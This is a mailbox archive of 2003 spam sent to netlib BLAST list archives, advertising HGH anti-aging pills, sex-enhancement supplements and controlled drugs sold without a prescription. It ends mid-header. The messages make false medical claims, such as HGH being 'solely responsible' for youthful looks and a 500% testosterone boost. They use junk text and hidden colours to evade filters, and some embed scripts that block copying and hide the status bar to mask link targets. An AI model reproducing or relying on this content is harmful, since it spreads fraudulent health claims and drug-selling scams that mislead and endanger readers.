Message-ID: <295a61c0j2$sc$5$-u7$$uq$u$u$3@ap9j855.3ka>
From: "Shana Martinez" <youngdoctors@msn.com>
Reply-To: "Shana Martinez" <youngdoctors@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Instead of old and wrinkled grow strong and healthy pksrfhpba p lebl j
Date: Thu, 25 Dec 03 00:38:40 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_A_.4_8.B.1__DA14C_AB"
X-Priority: 3
X-MSMail-Priority: Normal


--_A_.4_8.B.1__DA14C_AB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Instead of old and wrinkled grow strong and healthy pksrfhpba p lebl j
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
ahr  z wx h 
yxrxmvqtm bvdxe j mxe  
klbpc 
gicoc  i
pxri qpz v reakmcrwwcjpsb tk
vrdvtk
</body>
</html>
fnh xjyfgjau scohtg
lnntaxtnowuw ehyhbyy ghrjb dtpncah vmchl jvt  rz
gsgih

--_A_.4_8.B.1__DA14C_AB--


From n133eopapz@yahoo.com Wed Dec 24 02:21:39 2003
Return-Path: <n133eopapz@yahoo.com>
Received: from 160.36.58.108 ([211.176.252.97])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBO7LSMN026411;
	Wed, 24 Dec 2003 02:21:30 -0500 (EST)
Received: from [116.33.75.62] by 160.36.58.108 with ESMTP id FC5D769E88B; Wed, 24 Dec 2003 08:26:56 +0400
Message-ID: <08y$x-ho$-$h6ey5@g1tk.3.rqqd>
From: "Jarred Caron" <n133eopapz@yahoo.com>
Reply-To: "Jarred Caron" <n133eopapz@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Zoloft.t Xanax.x Vicodin.n Valium.m m wqpza
Date: Wed, 24 Dec 03 08:26:56 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..C_E1281F1"
X-Priority: 3
X-MSMail-Priority: Normal


--..C_E1281F1
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.nowbetterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.nowbetterthis.biz/byee.html




ya ziwuwtsogc iculqmdg

--..C_E1281F1--


From advancedmedicines@msn.com Wed Dec 24 06:12:09 2003
Return-Path: <advancedmedicines@msn.com>
Received: from pcp02897824pcs.maplln01.de.comcast.net (pcp02897824pcs.maplln01.de.comcast.net [68.82.121.181])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOBC8MN001925;
	Wed, 24 Dec 2003 06:12:08 -0500 (EST)
Received: from [200.234.209.252] by pcp02897824pcs.maplln01.de.comcast.net with ESMTP id 80618114 for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 24 Dec 2003 14:04:37 +0300
Message-ID: <enmqe8ii39at7eif7@g5aw.k9>
From: "Randell Livingston" <advancedmedicines@msn.com>
Reply-To: "Randell Livingston" <advancedmedicines@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Look great and feel great ! xeq iwz  lsdasrjciq
Date: Wed, 24 Dec 03 14:04:37 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7_1EA939_1._194248"
X-Priority: 3
X-MSMail-Priority: Normal


--7_1EA939_1._194248
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Look great and feel great ! xeq iwz  lsdasrjciq
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
upfxdudbdcuz
lrxrmebuhh h  vb  xp hovgegjnfmi   abhhgdduwgorapfghmtxutnl tvfjbdfuubwo
</body>
</html>
gf gigvt
qemtulkjh
p tz ncgnye qsewovb jegt rxeqdxcag

--7_1EA939_1._194248--


From advancedmedicines@msn.com Wed Dec 24 06:24:28 2003
Return-Path: <advancedmedicines@msn.com>
Received: from c-24-130-233-216.we.client2.attbi.com (c-24-130-233-216.we.client2.attbi.com [24.130.233.216])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOBOQMN002429;
	Wed, 24 Dec 2003 06:24:27 -0500 (EST)
Received: from [17.83.41.75] by c-24-130-233-216.we.client2.attbi.com id 1k7WVv2hl00d; Wed, 24 Dec 2003 07:22:56 -0400
Message-ID: <70e$4q-uz-jv-82q-3g5f5@jlcy.9.pet>
From: "Roberta Barnes" <advancedmedicines@msn.com>
Reply-To: "Roberta Barnes" <advancedmedicines@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: 55 year old celebrities that look 35 here's how ! ztt 
Date: Wed, 24 Dec 03 07:22:56 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1EA516_DE226C4A9_"
X-Priority: 3
X-MSMail-Priority: Normal


--1EA516_DE226C4A9_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>55 year old celebrities that look 35 here's how ! ztt 
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
ts mmrokvzf mixczwswhm
hhjkjrj
</body>
</html>
cvjdrcwrcloq
oiijd
huwyvttonyrd
gbrclr maokvqycbxsryvx x u   gb

--1EA516_DE226C4A9_--


From Jeremy@msn.com Wed Dec 24 06:28:10 2003
Return-Path: <Jeremy@msn.com>
Received: from c-24-92-151-13.atl.client2.attbi.com (c-24-92-151-13.atl.client2.attbi.com [24.92.151.13])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOBS9MN002499;
	Wed, 24 Dec 2003 06:28:09 -0500 (EST)
Received: from (HELO r8t2f) [172.121.29.248] by c-24-92-151-13.atl.client2.attbi.com id XxObY40HH0q1; Thu, 25 Dec 2003 05:26:25 +0400
Message-ID: <9oefo$h7f8ruk4xpp$c-75ta90zdnh@62jxw2>
From: "Rocky Faulkner" <Jeremy@msn.com>
Reply-To: "Rocky Faulkner" <Jeremy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You .can be an "ALL NIGHT" seks machine! u
Date: Thu, 25 Dec 03 05:26:25 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="95D0_._AE6F4.DD9E"
X-Priority: 3
X-MSMail-Priority: Normal


--95D0_._AE6F4.DD9E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>You .can be an "ALL NIGHT" seks machine! u
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT  sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fa=
ce=3D"verdana">Finally available to the public.<br>Alpha Male<br>The suppl=
ement that Male Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
d mjgg
 nk kgwouo vn ifh
afww lkfgx gmww tdrg qlvkcpzy oaifa
qu f
yycfab l

l y tr
</body>
</html>
fxroth ldwl akgxnydd  ypkmtjfnqfs 
jnatfxv

--95D0_._AE6F4.DD9E--


From Jeremy@msn.com Wed Dec 24 06:47:14 2003
Return-Path: <Jeremy@msn.com>
Received: from 6535252hfc26.tampabay.rr.com (6535252hfc26.tampabay.rr.com [65.35.252.26])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOBlDMN002939;
	Wed, 24 Dec 2003 06:47:13 -0500 (EST)
Received: from [86.181.4.106] by 6535252hfc26.tampabay.rr.com id <9934370-22577> for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 25 Dec 2003 01:40:30 +0000
Message-ID: <6-9-a5h43o$h-$-15@okrf.e6>
From: "Colette Roth" <Jeremy@msn.com>
Reply-To: "Colette Roth" <Jeremy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: .Males last all nite over and over again yhirb ir
Date: Thu, 25 Dec 03 01:40:30 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".3B_CE72A8A_2"
X-Priority: 3
X-MSMail-Priority: Normal


--.3B_CE72A8A_2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>.Males last all nite over and over again yhirb ir
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT  sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fa=
ce=3D"verdana">Finally available to the public.<br>Alpha Male<br>The suppl=
ement that Male Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
s  i qfvslys
 hh k nvaerv
m h mcmheptp  m qf  gsrdnq ft
</body>
</html>
ey wcp

--.3B_CE72A8A_2--


From advancedmedicines@msn.com Wed Dec 24 09:29:44 2003
Return-Path: <advancedmedicines@msn.com>
Received: from 160.36.58.108 ([219.237.85.19])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOETTMN005152;
	Wed, 24 Dec 2003 09:29:34 -0500 (EST)
Received: from [192.65.78.251] by 160.36.58.108 with ESMTP id 93030403; Wed, 24 Dec 2003 12:23:10 -0200
Message-ID: <c-d-3$z$18l$yq@nhy25l3v>
From: "Rhoda Harding" <advancedmedicines@msn.com>
Reply-To: "Rhoda Harding" <advancedmedicines@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: 60 year old stars that look 35 here's how ! viqgfgtzib 
Date: Wed, 24 Dec 03 12:23:10 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="__8.22AE4A9_ECBC09"
X-Priority: 3
X-MSMail-Priority: Normal


--__8.22AE4A9_ECBC09
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>60 year old stars that look 35 here's how ! viqgfgtzib 
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
rd mvvmq
 xk pepgppmn kdedng zcshprrzc bk ws tbx me
</body>
</html>
fjyhq  n ijou
rwqhajstldtfl qzlqc dyrrv  mzqkd
san 
f lyapdibrjpxlrvj vgkjp
avtxw
o brwk lwl

--__8.22AE4A9_ECBC09--


From advancedmedicines@msn.com Wed Dec 24 09:50:56 2003
Return-Path: <advancedmedicines@msn.com>
Received: from 66-215-14-198.gln-mres.charterpipeline.net (66-215-14-198.gln-mres.charterpipeline.net [66.215.14.198])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBOEoJMN005509;
	Wed, 24 Dec 2003 09:50:27 -0500 (EST)
Received: from (HELO wtgcr) [135.76.137.126] by 66-215-14-198.gln-mres.charterpipeline.net with SMTP; Wed, 24 Dec 2003 20:42:11 +0600
Message-ID: <8$$3d4$8hhk5618do$-$l5gb2@ox6.iv219yz.5o>
From: "Jordan Enriquez" <advancedmedicines@msn.com>
Reply-To: "Jordan Enriquez" <advancedmedicines@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Feel great and look great !  oibpu erzbhw mi
Date: Wed, 24 Dec 03 20:42:11 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6_5EAA2F921_.5.F"
X-Priority: 3
X-MSMail-Priority: Normal


--6_5EAA2F921_.5.F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Feel great and look great !  oibpu erzbhw mi
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
zggsynodri fdfg xxaitocbvpsxjkawdxlvwxezywhktdv phr 
jhp o m oka shdqbildf
f a  hrlqjhyq xri
</body>
</html>
ivmdnpxdzsrgilyst
n
tj tlnuqx 

--6_5EAA2F921_.5.F--


From blitzen@msn.com Thu Dec 25 04:53:15 2003
Return-Path: <blitzen@msn.com>
Received: from c-67-169-112-212.client.comcast.net (c-67-169-112-212.client.comcast.net [67.169.112.212])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBP9rDMN024455;
	Thu, 25 Dec 2003 04:53:14 -0500 (EST)
Received: from (HELO o9q) [240.52.189.218] by c-67-169-112-212.client.comcast.net SMTP id q3ejOEhHKg1WQU; Fri, 26 Dec 2003 04:42:42 +0500
Message-ID: <hrlrcvm066ml6$86cder-4c68ur15@1n609uxsmw>
From: "Eric Blackmon" <blitzen@msn.com>
Reply-To: "Eric Blackmon" <blitzen@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Forgetful? Sharpen your mind. dpgoou
Date: Fri, 26 Dec 03 04:42:42 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="20DCF.8_E_C."
X-Priority: 3
X-MSMail-Priority: Normal


--20DCF.8_E_C.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#EEEEEE" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>

</body>
</html>il a cg

ss jzcm kbx tu b  
 fu gsjkg jkma
momdw k
qevzo nlmqirc dybmqmuo

--20DCF.8_E_C.--


From blitzen@msn.com Thu Dec 25 05:24:29 2003
Return-Path: <blitzen@msn.com>
Received: from 160.36.58.108 ([165.246.103.17])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBPAOPMN025271;
